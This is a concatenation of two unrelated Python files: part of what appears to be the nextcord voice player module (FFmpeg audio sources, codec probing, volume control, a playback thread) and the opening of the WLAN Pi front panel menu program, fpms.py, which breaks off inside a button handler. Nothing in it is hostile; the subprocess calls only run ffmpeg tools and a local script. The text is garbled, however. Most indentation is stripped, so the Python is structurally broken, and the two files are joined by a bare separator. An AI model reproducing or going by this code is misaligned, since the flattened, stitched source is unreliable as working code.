kwargs = {'stdout': subprocess.PIPE}
kwargs.update(subprocess_kwargs)
self._process: subprocess.Popen = self._spawn_process(args, **kwargs)
self._stdout: IO[bytes] = self._process.stdout # type: ignore
        self._stdin: Optional[IO[bytes]] = None
self._pipe_thread: Optional[threading.Thread] = None
if piping:
n = f'popen-stdin-writer:{id(self):#x}'
self._stdin = self._process.stdin
self._pipe_thread = threading.Thread(target=self._pipe_writer, args=(source,), daemon=True, name=n)
self._pipe_thread.start()
def _spawn_process(self, args: Any, **subprocess_kwargs: Any) -> subprocess.Popen:
process = None
try:
process = subprocess.Popen(args, creationflags=CREATE_NO_WINDOW, **subprocess_kwargs)
except FileNotFoundError:
executable = args.partition(' ')[0] if isinstance(args, str) else args[0]
raise ClientException(executable + ' was not found.') from None
except subprocess.SubprocessError as exc:
raise ClientException(f'Popen failed: {exc.__class__.__name__}: {exc}') from exc
else:
return process
def _kill_process(self) -> None:
proc = self._process
if proc is MISSING:
return
_log.info('Preparing to terminate ffmpeg process %s.', proc.pid)
try:
proc.kill()
except Exception:
_log.exception('Ignoring error attempting to kill ffmpeg process %s', proc.pid)
if proc.poll() is None:
_log.info('ffmpeg process %s has not terminated. Waiting to terminate...', proc.pid)
proc.communicate()
_log.info('ffmpeg process %s should have terminated with a return code of %s.', proc.pid, proc.returncode)
else:
_log.info('ffmpeg process %s successfully terminated with return code of %s.', proc.pid, proc.returncode)
def _pipe_writer(self, source: io.BufferedIOBase) -> None:
while self._process:
# arbitrarily large read size
data = source.read(8192)
if not data:
self._process.terminate()
return
try:
self._stdin.write(data)
except Exception:
_log.debug('Write error for %s, this is probably not a problem', self, exc_info=True)
# at this point the source data is either exhausted or the process is fubar
self._process.terminate()
return
def cleanup(self) -> None:
self._kill_process()
self._process = self._stdout = self._stdin = MISSING
class FFmpegPCMAudio(FFmpegAudio):
"""An audio source from FFmpeg (or AVConv).
This launches a sub-process to a specific input file given.
.. warning::
You must have the ffmpeg or avconv executable in your path environment
variable in order for this to work.
Parameters
------------
source: Union[:class:`str`, :class:`io.BufferedIOBase`]
The input that ffmpeg will take and convert to PCM bytes.
If ``pipe`` is ``True`` then this is a file-like object that is
passed to the stdin of ffmpeg.
executable: :class:`str`
The executable name (and path) to use. Defaults to ``ffmpeg``.
pipe: :class:`bool`
If ``True``, denotes that ``source`` parameter will be passed
to the stdin of ffmpeg. Defaults to ``False``.
stderr: Optional[:term:`py:file object`]
A file-like object to pass to the Popen constructor.
Could also be an instance of ``subprocess.PIPE``.
before_options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg before the ``-i`` flag.
options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg after the ``-i`` flag.
Raises
--------
ClientException
The subprocess failed to be created.
"""
def __init__(
self,
source: Union[str, io.BufferedIOBase],
*,
executable: str = 'ffmpeg',
pipe: bool = False,
stderr: Optional[IO[str]] = None,
before_options: Optional[str] = None,
options: Optional[str] = None
) -> None:
args = []
subprocess_kwargs = {'stdin': subprocess.PIPE if pipe else subprocess.DEVNULL, 'stderr': stderr}
if isinstance(before_options, str):
args.extend(shlex.split(before_options))
args.append('-i')
args.append('-' if pipe else source)
args.extend(('-f', 's16le', '-ar', '48000', '-ac', '2', '-loglevel', 'warning'))
if isinstance(options, str):
args.extend(shlex.split(options))
args.append('pipe:1')
super().__init__(source, executable=executable, args=args, **subprocess_kwargs)
def read(self) -> bytes:
ret = self._stdout.read(OpusEncoder.FRAME_SIZE)
if len(ret) != OpusEncoder.FRAME_SIZE:
return b''
return ret
def is_opus(self) -> bool:
return False
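# Illustrative usage sketch (assumes a connected ``voice_client`` and a local
# file ``song.mp3``, neither of which is defined here). It shows how
# ``before_options``/``options`` map onto the ffmpeg command line built above:
# ``before_options`` is placed before ``-i`` and ``options`` after it.
#
#   source = FFmpegPCMAudio(
#       'song.mp3',
#       before_options='-ss 30',       # seek 30 seconds into the input
#       options='-af "volume=0.5"',    # filter applied after the input flag
#   )
#   voice_client.play(source)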
class FFmpegOpusAudio(FFmpegAudio):
"""An audio source from FFmpeg (or AVConv).
This launches a sub-process to a specific input file given. However, rather than
producing PCM packets like :class:`FFmpegPCMAudio` does that need to be encoded to
Opus, this class produces Opus packets, skipping the encoding step done by the library.
Alternatively, instead of instantiating this class directly, you can use
:meth:`FFmpegOpusAudio.from_probe` to probe for bitrate and codec information. This
can be used to opportunistically skip pointless re-encoding of existing Opus audio data
for a boost in performance at the cost of a short initial delay to gather the information.
The same can be achieved by passing ``copy`` to the ``codec`` parameter, but only if you
know that the input source is Opus encoded beforehand.
.. versionadded:: 1.3
.. warning::
You must have the ffmpeg or avconv executable in your path environment
variable in order for this to work.
Parameters
------------
source: Union[:class:`str`, :class:`io.BufferedIOBase`]
The input that ffmpeg will take and convert to Opus bytes.
If ``pipe`` is ``True`` then this is a file-like object that is
passed to the stdin of ffmpeg.
bitrate: :class:`int`
The bitrate in kbps to encode the output to. Defaults to ``128``.
codec: Optional[:class:`str`]
The codec to use to encode the audio data. Normally this would be
just ``libopus``, but is used by :meth:`FFmpegOpusAudio.from_probe` to
opportunistically skip pointlessly re-encoding Opus audio data by passing
``copy`` as the codec value. Any values other than ``copy``, ``opus``, or
``libopus`` will be considered ``libopus``. Defaults to ``libopus``.
.. warning::
Do not provide this parameter unless you are certain that the audio input is
already Opus encoded. For typical use :meth:`FFmpegOpusAudio.from_probe`
should be used to determine the proper value for this parameter.
executable: :class:`str`
The executable name (and path) to use. Defaults to ``ffmpeg``.
pipe: :class:`bool`
If ``True``, denotes that ``source`` parameter will be passed
to the stdin of ffmpeg. Defaults to ``False``.
stderr: Optional[:term:`py:file object`]
A file-like object to pass to the Popen constructor.
Could also be an instance of ``subprocess.PIPE``.
before_options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg before the ``-i`` flag.
options: Optional[:class:`str`]
Extra command line arguments to pass to ffmpeg after the ``-i`` flag.
Raises
--------
ClientException
The subprocess failed to be created.
"""
def __init__(
self,
source: Union[str, io.BufferedIOBase],
*,
bitrate: int = 128,
codec: Optional[str] = None,
executable: str = 'ffmpeg',
pipe=False,
stderr=None,
before_options=None,
options=None,
) -> None:
args = []
subprocess_kwargs = {'stdin': subprocess.PIPE if pipe else subprocess.DEVNULL, 'stderr': stderr}
if isinstance(before_options, str):
args.extend(shlex.split(before_options))
args.append('-i')
args.append('-' if pipe else source)
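        # pass already-Opus input through untouched ('copy'); anything else is re-encoded with libopus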
codec = 'copy' if codec in ('opus', 'libopus') else 'libopus'
args.extend(('-map_metadata', '-1',
'-f', 'opus',
'-c:a', codec,
'-ar', '48000',
'-ac', '2',
'-b:a', f'{bitrate}k',
'-loglevel', 'warning'))
if isinstance(options, str):
args.extend(shlex.split(options))
args.append('pipe:1')
super().__init__(source, executable=executable, args=args, **subprocess_kwargs)
self._packet_iter = OggStream(self._stdout).iter_packets()
@classmethod
async def from_probe(
cls: Type[FT],
source: str,
*,
method: Optional[Union[str, Callable[[str, str], Tuple[Optional[str], Optional[int]]]]] = None,
**kwargs: Any,
) -> FT:
"""|coro|
A factory method that creates a :class:`FFmpegOpusAudio` after probing
the input source for audio codec and bitrate information.
Examples
----------
Use this function to create an :class:`FFmpegOpusAudio` instance instead of the constructor: ::
source = await nextcord.FFmpegOpusAudio.from_probe("song.webm")
voice_client.play(source)
If you are on Windows and don't have ffprobe installed, use the ``fallback`` method
to probe using ffmpeg instead: ::
source = await nextcord.FFmpegOpusAudio.from_probe("song.webm", method='fallback')
voice_client.play(source)
Using a custom method of determining codec and bitrate: ::
def custom_probe(source, executable):
# some analysis code here
return codec, bitrate
source = await nextcord.FFmpegOpusAudio.from_probe("song.webm", method=custom_probe)
voice_client.play(source)
Parameters
------------
source
Identical to the ``source`` parameter for the constructor.
method: Optional[Union[:class:`str`, Callable[:class:`str`, :class:`str`]]]
The probing method used to determine bitrate and codec information. As a string, valid
values are ``native`` to use ffprobe (or avprobe) and ``fallback`` to use ffmpeg
(or avconv). As a callable, it must take two string arguments, ``source`` and
``executable``. Both parameters are the same values passed to this factory function.
``executable`` will default to ``ffmpeg`` if not provided as a keyword argument.
kwargs
The remaining parameters to be passed to the :class:`FFmpegOpusAudio` constructor,
excluding ``bitrate`` and ``codec``.
Raises
--------
AttributeError
Invalid probe method, must be ``'native'`` or ``'fallback'``.
TypeError
Invalid value for ``probe`` parameter, must be :class:`str` or a callable.
Returns
--------
:class:`FFmpegOpusAudio`
An instance of this class.
"""
executable = kwargs.get('executable')
codec, bitrate = await cls.probe(source, method=method, executable=executable)
return cls(source, bitrate=bitrate, codec=codec, **kwargs) # type: ignore
@classmethod
async def probe(
cls,
source: str,
*,
method: Optional[Union[str, Callable[[str, str], Tuple[Optional[str], Optional[int]]]]] = None,
executable: Optional[str] = None,
) -> Tuple[Optional[str], Optional[int]]:
"""|coro|
Probes the input source for bitrate and codec information.
Parameters
------------
source
Identical to the ``source`` parameter for :class:`FFmpegOpusAudio`.
method
Identical to the ``method`` parameter for :meth:`FFmpegOpusAudio.from_probe`.
executable: :class:`str`
Identical to the ``executable`` parameter for :class:`FFmpegOpusAudio`.
Raises
--------
AttributeError
Invalid probe method, must be ``'native'`` or ``'fallback'``.
TypeError
Invalid value for ``probe`` parameter, must be :class:`str` or a callable.
Returns
---------
Optional[Tuple[Optional[:class:`str`], Optional[:class:`int`]]]
A 2-tuple with the codec and bitrate of the input source.
"""
method = method or 'native'
executable = executable or 'ffmpeg'
probefunc = fallback = None
if isinstance(method, str):
probefunc = getattr(cls, '_probe_codec_' + method, None)
if probefunc is None:
raise AttributeError(f"Invalid probe method {method!r}")
if probefunc is cls._probe_codec_native:
fallback = cls._probe_codec_fallback
elif callable(method):
probefunc = method
fallback = cls._probe_codec_fallback
else:
raise TypeError("Expected str or callable for parameter 'probe', " \
f"not '{method.__class__.__name__}'")
codec = bitrate = None
loop = asyncio.get_event_loop()
try:
codec, bitrate = await loop.run_in_executor(None, lambda: probefunc(source, executable)) # type: ignore
except Exception:
if not fallback:
_log.exception("Probe '%s' using '%s' failed", method, executable)
return # type: ignore
_log.exception("Probe '%s' using '%s' failed, trying fallback", method, executable)
try:
codec, bitrate = await loop.run_in_executor(None, lambda: fallback(source, executable)) # type: ignore
except Exception:
_log.exception("Fallback probe using '%s' failed", executable)
else:
_log.info("Fallback probe found codec=%s, bitrate=%s", codec, bitrate)
else:
_log.info("Probe found codec=%s, bitrate=%s", codec, bitrate)
finally:
return codec, bitrate
@staticmethod
def _probe_codec_native(source, executable: str = 'ffmpeg') -> Tuple[Optional[str], Optional[int]]:
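        # derive the matching probe tool from the encoder name: 'ffmpeg' -> 'ffprobe', 'avconv' -> 'avprobe'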
exe = executable[:2] + 'probe' if executable in ('ffmpeg', 'avconv') else executable
args = [exe, '-v', 'quiet', '-print_format', 'json', '-show_streams', '-select_streams', 'a:0', source]
output = subprocess.check_output(args, timeout=20)
codec = bitrate = None
if output:
data = json.loads(output)
streamdata = data['streams'][0]
codec = streamdata.get('codec_name')
bitrate = int(streamdata.get('bit_rate', 0))
bitrate = max(round(bitrate/1000), 512)
return codec, bitrate
@staticmethod
def _probe_codec_fallback(source, executable: str = 'ffmpeg') -> Tuple[Optional[str], Optional[int]]:
args = [executable, '-hide_banner', '-i', source]
proc = subprocess.Popen(args, creationflags=CREATE_NO_WINDOW, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
out, _ = proc.communicate(timeout=20)
output = out.decode('utf8')
codec = bitrate = None
codec_match = re.search(r"Stream #0.*?Audio: (\w+)", output)
if codec_match:
codec = codec_match.group(1)
br_match = re.search(r"(\d+) [kK]b/s", output)
if br_match:
bitrate = max(int(br_match.group(1)), 512)
return codec, bitrate
def read(self) -> bytes:
return next(self._packet_iter, b'')
def is_opus(self) -> bool:
return True
class PCMVolumeTransformer(AudioSource, Generic[AT]):
"""Transforms a previous :class:`AudioSource` to have volume controls.
This does not work on audio sources that have :meth:`AudioSource.is_opus`
set to ``True``.
Parameters
------------
original: :class:`AudioSource`
The original AudioSource to transform.
volume: :class:`float`
The initial volume to set it to.
See :attr:`volume` for more info.
Raises
-------
TypeError
Not an audio source.
ClientException
The audio source is opus encoded.
"""
def __init__(self, original: AT, volume: float = 1.0):
if not isinstance(original, AudioSource):
raise TypeError(f'expected AudioSource not {original.__class__.__name__}.')
if original.is_opus():
raise ClientException('AudioSource must not be Opus encoded.')
self.original: AT = original
self.volume = volume
@property
def volume(self) -> float:
"""Retrieves or sets the volume as a floating point percentage (e.g. ``1.0`` for 100%)."""
return self._volume
@volume.setter
def volume(self, value: float) -> None:
self._volume = max(value, 0.0)
def cleanup(self) -> None:
self.original.cleanup()
def read(self) -> bytes:
ret = self.original.read()
return audioop.mul(ret, 2, min(self._volume, 2.0))
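# Illustrative usage sketch (assumes a connected ``voice_client``, not defined
# here). PCMVolumeTransformer only accepts non-Opus sources, so pair it with
# FFmpegPCMAudio rather than FFmpegOpusAudio and adjust ``volume`` during
# playback.
#
#   source = PCMVolumeTransformer(FFmpegPCMAudio('song.mp3'), volume=0.5)
#   voice_client.play(source)
#   source.volume = 1.0  # later: back to 100% while still playing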
class AudioPlayer(threading.Thread):
DELAY: float = OpusEncoder.FRAME_LENGTH / 1000.0
def __init__(self, source: AudioSource, client: VoiceClient, *, after=None):
threading.Thread.__init__(self)
self.daemon: bool = True
self.source: AudioSource = source
self.client: VoiceClient = client
self.after: Optional[Callable[[Optional[Exception]], Any]] = after
self._end: threading.Event = threading.Event()
self._resumed: threading.Event = threading.Event()
self._resumed.set() # we are not paused
self._current_error: Optional[Exception] = None
self._connected: threading.Event = client._connected
self._lock: threading.Lock = threading.Lock()
if after is not None and not callable(after):
raise TypeError('Expected a callable for the "after" parameter.')
def _do_run(self) -> None:
self.loops = 0
self._start = time.perf_counter()
# getattr lookup speed ups
play_audio = self.client.send_audio_packet
self._speak(True)
while not self._end.is_set():
# are we paused?
if not self._resumed.is_set():
# wait until we aren't
self._resumed.wait()
continue
# are we disconnected from voice?
if not self._connected.is_set():
# wait until we are connected
self._connected.wait()
# reset our internal data
self.loops = 0
self._start = time.perf_counter()
self.loops += 1
data = self.source.read()
if not data:
self.stop()
break
play_audio(data, encode=not self.source.is_opus())
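            # Absolute scheduling: each frame is timed against the loop's start
            # rather than the previous iteration, so per-frame jitter does not
            # accumulate; if sending ran long, the next sleep is shortened
            # (never below zero) to catch back up.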
next_time = self._start + self.DELAY * self.loops
delay = max(0, self.DELAY + (next_time - time.perf_counter()))
time.sleep(delay)
def run(self) -> None:
try:
self._do_run()
except Exception as exc:
self._current_error = exc
self.stop()
finally:
self.source.cleanup()
self._call_after()
def _call_after(self) -> None:
error = self._current_error
if self.after is not None:
try:
self.after(error)
except Exception as exc:
_log.exception('Calling the after function failed.')
exc.__context__ = error
traceback.print_exception(type(exc), exc, exc.__traceback__)
elif error:
msg = f'Exception in voice thread {self.name}'
_log.exception(msg, exc_info=error)
print(msg, file=sys.stderr)
traceback.print_exception(type(error), error, error.__traceback__)
def stop(self) -> None:
self._end.set()
self._resumed.set()
self._speak(False)
def pause(self, *, update_speaking: bool = True) -> None:
self._resumed.clear()
if update_speaking:
self._speak(False)
def resume(self, *, update_speaking: bool = True) -> None:
self.loops = 0
self._start = time.perf_counter()
self._resumed.set()
if update_speaking:
self._speak(True)
def is_playing(self) -> bool:
return self._resumed.is_set() and not self._end.is_set()
def is_paused(self) -> bool:
return not self._end.is_set() and not self._resumed.is_set()
def _set_source(self, source: AudioSource) -> None:
with self._lock:
self.pause(update_speaking=False)
self.source = source
self.resume(update_speaking=False)
def _speak(self, speaking: bool) -> None:
try:
asyncio.run_coroutine_threadsafe(self.client.ws.speak(speaking), self.client.loop)
except Exception as e:
_log.info("Speaking call in player failed: %s", e)
|
fpms.py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
FPMS
~~~~
Front Panel Menu System
"""
import getopt
import os
import os.path
import random
import signal
import socket
import subprocess
import sys
import termios
import threading
import time
import tty
from gpiozero import Button as GPIO_Button
from gpiozero import Device
from gpiozero.pins.mock import MockFactory
from PIL import Image, ImageDraw, ImageFont
# Check we're running as root
if os.geteuid() != 0:
print("fpms must be run as root ... exiting ...")
sys.exit(-1)
from .__version__ import __title__, __version__
from .modules import wlanpi_oled as oled
from .modules.apps.profiler import *
from .modules.apps.scanner import *
from .modules.bluetooth import *
from .modules.cloud_tests import CloudUtils
from .modules.constants import (
BUTTONS_PINS,
DISPLAY_MODE,
IMAGE_DIR,
MODE_FILE,
NAV_BAR_TOP,
PAGE_HEIGHT,
PAGE_SLEEP,
PAGE_WIDTH,
SCRIPT_PATH,
WLANPI_IMAGE_FILE,
)
from .modules.env_utils import EnvUtils
from .modules.modes import *
from .modules.nav.buttons import Button
from .modules.network import *
from .modules.pages.display import Display
from .modules.pages.homepage import HomePage
from .modules.pages.page import Page
from .modules.pages.pagedtable import PagedTable
from .modules.pages.simpletable import SimpleTable
from .modules.system import *
from .modules.battery import *
from .modules.utils import *
def main():
global running
####################################
# Parse arguments
####################################
def authors():
authors = os.path.realpath(os.path.join(os.getcwd(), "AUTHORS.md"))
if not os.path.isfile(authors):
# Couldn't find authors
print(authors)
return ""
else:
with open(authors) as f:
return "\n".join(filter(None, [line if line.startswith('*') else "" for line in f.read().splitlines()]))
def usage():
return """
usage: fpms [-a] [-h] [-e] [-v]
wlanpi-fpms drives the Front Panel Menu System on the WLAN Pi
optional arguments:
-a print authors
-e emulate buttons from keyboard
-h show this message and exit
-v show module version and exit
"""
try:
opts, _args = getopt.getopt(sys.argv[1:], ":ahev", ["authors", "help", "emulate-buttons", "version"])
except getopt.GetoptError as error:
print("{0} ... ".format(error))
print(usage())
sys.exit(2)
emulate = False
for opt, arg in opts:
if opt in ['-e', "--emulate-buttons"]:
emulate = True
elif opt in ("-a", "--authors"):
print(authors())
sys.exit()
elif opt in ("-h", "--help"):
print(usage())
sys.exit()
elif opt in ("-v", "--version"):
print("{0} {1}".format(__title__, __version__))
sys.exit()
else:
assert False, "unhandled option"
####################################
# Initialize the SEED OLED display
####################################
oled.init()
    # Set display to normal mode (i.e. non-inverse mode)
oled.setNormalDisplay()
oled.setHorizontalMode()
#######################################
# Initialize various global variables
#######################################
g_vars = {
##################################################
# Shared status signals (may be changed anywhere)
##################################################
# This variable is shared between activities and is set to True if a
# drawing action in already if progress (e.g. by another activity). An activity
# happens during each cycle of the main while loop or when a button is pressed
# (This does not appear to be threading or process spawning)
'drawing_in_progress': False, # True when page being painted on screen
'shutdown_in_progress': False, # True when shutdown or reboot started
'screen_cleared': False, # True when display cleared (e.g. screen save)
'display_state': 'page', # current display state: 'page' or 'menu'
'sig_fired': False, # Set to True when button handler fired
'option_selected': 0, # Content of currently selected menu level
'current_menu_location': [0], # Pointer to current location in menu structure
'current_scroll_selection': 0, # where we currently are in scrolling table
'current_mode': 'classic', # Currently selected mode (e.g. wconsole/classic)
'start_up': True, # True if in initial (home page) start-up state
'disable_keys': False, # Set to true when need to ignore key presses
'table_list_length': 0, # Total length of currently displayed table
'table_pages': 1, # pages in current table
'result_cache': False, # used to cache results when paging info
'speedtest_status': False, # Indicates if speedtest has run or is in progress
    'speedtest_result_text': '', # tabulated speedtest result data
    'button_press_count': 0, # global count of button presses
    'last_button_press_count': -1, # copy of count of button presses used in main loop
'pageSleepCountdown': PAGE_SLEEP, # Set page sleep control
'home_page_name': "Home", # Display name for top level menu
'blinker_status': False, # Blinker status
'eth_carrier_status': 0, # Eth0 physical link status
'eth_last_known_address': "", # Last known eth0 address
'eth_last_reachability_test': 0, # Number of seconds elapsed since last reachability test
'eth_last_reachability_result' : True, # Last reachability state
}
############################
# shared objects
############################
g_vars['image'] = Image.new(DISPLAY_MODE, (PAGE_WIDTH, PAGE_HEIGHT))
g_vars['draw'] = ImageDraw.Draw(g_vars['image'])
g_vars['reboot_image'] = Image.open(IMAGE_DIR + '/reboot.png').convert(DISPLAY_MODE)
#####################################
# check our current operating mode
#####################################
env_utils = EnvUtils()
g_vars['current_mode'] = env_utils.get_mode(MODE_FILE)
#######################################################################
# Server mode non-persistence
# If the Pi is in Server schedule mode switch to Classic for next boot
#######################################################################
if g_vars['current_mode'] == "server":
schedule_server_to_classic = "/etc/wlanpi-server/scripts/schedule-switch-to-classic"
subprocess.Popen([schedule_server_to_classic])
##################################
# Static info we want to get once
##################################
    # get the current version of the WLANPi image
g_vars['wlanpi_ver'] = env_utils.get_image_ver(WLANPI_IMAGE_FILE)
# get hostname
g_vars['hostname'] = env_utils.get_hostname()
###########################
# Network menu area utils
###########################
def show_interfaces():
network_obj = Network(g_vars)
network_obj.show_interfaces(g_vars)
def show_wlan_interfaces():
network_obj = Network(g_vars)
network_obj.show_wlan_interfaces(g_vars)
def show_eth0_ipconfig():
network_obj = Network(g_vars)
network_obj.show_eth0_ipconfig(g_vars)
def show_vlan():
network_obj = Network(g_vars)
network_obj.show_vlan(g_vars)
def show_lldp_neighbour():
network_obj = Network(g_vars)
network_obj.show_lldp_neighbour(g_vars)
def show_cdp_neighbour():
network_obj = Network(g_vars)
network_obj.show_cdp_neighbour(g_vars)
def show_publicip():
network_obj = Network(g_vars)
network_obj.show_publicip(g_vars)
def show_publicip6():
network_obj = Network(g_vars)
network_obj.show_publicip(g_vars, ip_version=6)
###########################
# Bluetooth menu area
###########################
def bluetooth_status():
bluetooth_obj = Bluetooth(g_vars)
bluetooth_obj.bluetooth_status(g_vars)
def bluetooth_pair():
bluetooth_obj = Bluetooth(g_vars)
bluetooth_obj.bluetooth_pair(g_vars)
def bluetooth_on():
bluetooth_obj = Bluetooth(g_vars)
bluetooth_obj.bluetooth_on(g_vars)
def bluetooth_off():
bluetooth_obj = Bluetooth(g_vars)
bluetooth_obj.bluetooth_off(g_vars)
###########################
# Utils menu area
###########################
def show_reachability():
utils_obj = Utils(g_vars)
utils_obj.show_reachability(g_vars)
def show_speedtest():
utils_obj = Utils(g_vars)
utils_obj.show_speedtest(g_vars)
def show_mist_test():
utils_obj = CloudUtils(g_vars)
utils_obj.test_mist_cloud(g_vars)
def show_aruba_test():
utils_obj = CloudUtils(g_vars)
utils_obj.test_aruba_cloud(g_vars)
def show_blinker():
utils_obj = Utils(g_vars)
utils_obj.show_blinker(g_vars)
def stop_blinker():
utils_obj = Utils(g_vars)
utils_obj.stop_blinker(g_vars)
def show_wpa_passphrase():
utils_obj = Utils(g_vars)
utils_obj.show_wpa_passphrase(g_vars)
def show_usb():
utils_obj = Utils(g_vars)
utils_obj.show_usb(g_vars)
def show_ufw():
utils_obj = Utils(g_vars)
utils_obj.show_ufw(g_vars)
############################
# Modes area
############################
def wconsole_switcher():
mode_obj = Mode(g_vars)
mode_obj.wconsole_switcher(g_vars)
def hotspot_switcher():
mode_obj = Mode(g_vars)
mode_obj.hotspot_switcher(g_vars)
def wiperf_switcher():
mode_obj = Mode(g_vars)
mode_obj.wiperf_switcher(g_vars)
def server_switcher():
mode_obj = Mode(g_vars)
mode_obj.server_switcher(g_vars)
###########################
# Apps area
###########################
def profiler_status():
app_obj = Profiler(g_vars)
app_obj.profiler_status(g_vars)
def profiler_stop():
app_obj = Profiler(g_vars)
app_obj.profiler_stop(g_vars)
def profiler_start():
app_obj = Profiler(g_vars)
app_obj.profiler_start(g_vars)
def profiler_start_no11r():
app_obj = Profiler(g_vars)
app_obj.profiler_start_no11r(g_vars)
def profiler_start_no11ax():
app_obj = Profiler(g_vars)
app_obj.profiler_start_no11ax(g_vars)
def profiler_purge_reports():
app_obj = Profiler(g_vars)
app_obj.profiler_purge_reports(g_vars)
def profiler_purge_files():
app_obj = Profiler(g_vars)
app_obj.profiler_purge_files(g_vars)
def scanner_scan():
app_obj = Scanner(g_vars)
app_obj.scanner_scan(g_vars)
def scanner_scan_nohidden():
app_obj = Scanner(g_vars)
app_obj.scanner_scan_nohidden(g_vars)
###########################
# System menu area utils
###########################
def shutdown():
system_obj = System(g_vars)
system_obj.shutdown(g_vars)
def reboot():
system_obj = System(g_vars)
system_obj.reboot(g_vars)
def show_summary():
system_obj = System(g_vars)
system_obj.show_summary(g_vars)
def show_battery():
system_obj = Battery(g_vars)
system_obj.show_battery(g_vars)
def show_date():
system_obj = System(g_vars)
system_obj.show_date(g_vars)
def show_about():
system_obj = System(g_vars)
system_obj.show_about(g_vars)
#############################
# Button presses & home page
#############################
def home_page():
homepage_obj = HomePage(g_vars)
homepage_obj.home_page(g_vars, menu)
def menu_down():
button_obj = Button(g_vars, menu)
button_obj.menu_down(g_vars, menu)
def menu_up():
button_obj = Button(g_vars, menu)
button_obj.menu_up(g_vars, menu)
def menu_left():
button_obj = Button(g_vars, menu)
button_obj.menu_left(g_vars, menu)
def menu_right():
button_obj = Button(g_vars, menu)
button_obj.menu_right(g_vars, menu)
def menu_center():
button_obj = Button(g_vars, menu)
button_obj.menu_center(g_vars, menu)
#######################
# menu structure here
#######################
# assume classic mode menu initially...
menu = [
{"name": "Network", "action": [
{"name": "Interfaces", "action": show_interfaces},
{"name": "WLAN Interfaces", "action": show_wlan_interfaces},
{"name": "Eth0 IP Config", "action": show_eth0_ipconfig},
{"name": "Eth0 VLAN", "action": show_vlan},
{"name": "LLDP Neighbour", "action": show_lldp_neighbour},
{"name": "CDP Neighbour", "action": show_cdp_neighbour},
{"name": "Public IPv4", "action": show_publicip},
{"name": "Public IPv6", "action": show_publicip6},
]
},
{"name": "Bluetooth", "action": [
{"name": "Status", "action": bluetooth_status},
{"name": "Turn On", "action": bluetooth_on},
{"name": "Turn Off", "action": bluetooth_off},
{"name": "Pair Device", "action": bluetooth_pair},
]
},
{"name": "Utils", "action": [
{"name": "Reachability", "action": show_reachability},
{"name": "Speedtest", "action": [
{"name": "Run Test", "action": show_speedtest},
]
},
{"name": "Cloud Tests", "action": [
{"name": "Run Aruba Test", "action": show_aruba_test},
{"name": "Run Mist Test", "action": show_mist_test},
]
},
{"name": "Port Blinker", "action": [
{"name": "Start", "action": show_blinker},
{"name": "Stop", "action": stop_blinker},
]
},
{"name": "WPA Passphrase", "action": show_wpa_passphrase},
{"name": "USB Devices", "action": show_usb},
{"name": "UFW Ports", "action": show_ufw},
]
},
{"name": "Modes", "action": [
{"name": "Wi-Fi Console", "action": [
{"name": "Confirm", "action": wconsole_switcher},
]
},
{"name": "Hotspot", "action": [
{"name": "Confirm", "action": hotspot_switcher},
]
},
{"name": "Wiperf", "action": [
{"name": "Confirm", "action": wiperf_switcher},
]
},
{"name": "Server", "action": [
{"name": "Confirm", "action": server_switcher},
]
},
]
},
{"name": "Apps", "action": [
{"name": "Profiler", "action": [
{"name": "Status", "action": profiler_status},
{"name": "Stop", "action": profiler_stop},
{"name": "Start", "action": profiler_start},
{"name": "Start (no 11r)", "action": profiler_start_no11r},
{"name": "Start (no 11ax)", "action": profiler_start_no11ax},
{"name": "Purge Reports", "action": [
{"name": "Confirm", "action": profiler_purge_reports},
]
},
{"name": "Purge Files", "action": [
{"name": "Confirm", "action": profiler_purge_files},
]
}
]
},
{"name": "Scanner", "action": [
{"name": "Scan", "action": scanner_scan},
{"name": "Scan (no hidden)", "action": scanner_scan_nohidden},
]
},
]
},
{"name": "System", "action": [
{"name": "Shutdown", "action": [
{"name": "Confirm", "action": shutdown},
]
},
{"name": "Reboot", "action": [
{"name": "Confirm", "action": reboot},
]
},
{"name": "Summary", "action": show_summary},
{"name": "Battery", "action": show_battery},
{"name": "Date/Time", "action": show_date},
{"name": "About", "action": show_about},
]
},
]
# update menu options data structure if we're in non-classic mode
if g_vars['current_mode'] == "wconsole":
switcher_dispatcher = wconsole_switcher
g_vars['home_page_name'] = "Wi-Fi Console"
if g_vars['current_mode'] == "hotspot":
switcher_dispatcher = hotspot_switcher
g_vars['home_page_name'] = "Hotspot"
if g_vars['current_mode'] == "wiperf":
switcher_dispatcher = wiperf_switcher
g_vars['home_page_name'] = "Wiperf"
if g_vars['current_mode'] == "server":
switcher_dispatcher = server_switcher
g_vars['home_page_name'] = "Server"
if g_vars['current_mode'] != "classic":
menu[3] = {"name": "Mode", "action": [
{"name": "Classic Mode", "action": [
{"name": "Confirm", "action": switcher_dispatcher},
]
},
]
}
menu.pop(4)
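    # Illustrative sketch only (not used by fpms itself): how a location
    # pointer such as g_vars['current_menu_location'] can be resolved against
    # the nested "name"/"action" structure above -- each index picks an entry,
    # and descent continues while that entry's "action" is itself a list.
    #
    #   def resolve_menu_entry(menu, location):
    #       entry = {"action": menu}
    #       for index in location:
    #           entry = entry["action"][index]
    #       return entry  # entry["action"] is either a callable or a sub-menu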
# Set up handlers to process key presses
def button_press(gpio_pin, g_vars=g_vars):
DOWN_KEY = BUTTONS_PINS['down']
UP_KEY = BUTTONS_PINS['up']
RIGHT_KEY = BUTTONS_PINS['right']
LEFT_KEY = BUTTONS_PINS['left']
CENTER_KEY = BUTTONS_PINS['center']
if g_vars['disable_keys'] == True:
# someone disabled the front panel keys as they don't want to be interrupted
return
if (g_vars['sig_fired']):
# signal handler already in progress, ignore this one
return
# user pressed a button, reset the sleep counter
g_vars['pageSleepCountdown'] = PAGE_SLEEP
g_vars['start_up'] = False
if g_vars['drawing_in_progress'] or g_vars['shutdown_in_progress']:
return
        # If we get this far, an action will be taken as a result of the button press
        # increment the button press counter to indicate that something has been done
# and a page refresh is required
g_vars['button_press_count'] += 1
# if display has been switched off to save screen, power back on and show home menu
if g_vars['screen_cleared']:
g_vars['screen_cleared'] = False
g_vars['pageSleepCountdown'] = PAGE_SLEEP
return
# Down key pressed
if gpio_pin == DOWN_KEY:
g_vars['sig_fired'] = True
menu_down()
g_vars['sig_fired'] = False
return
        # Up key pressed
if gpio_pin == UP_KEY:
g_vars['sig_fired'] = True
menu_up()
g_vars['sig_fired'] = False
return
# Right/Selection key pressed
if gpio_pin == RIGHT_KEY:
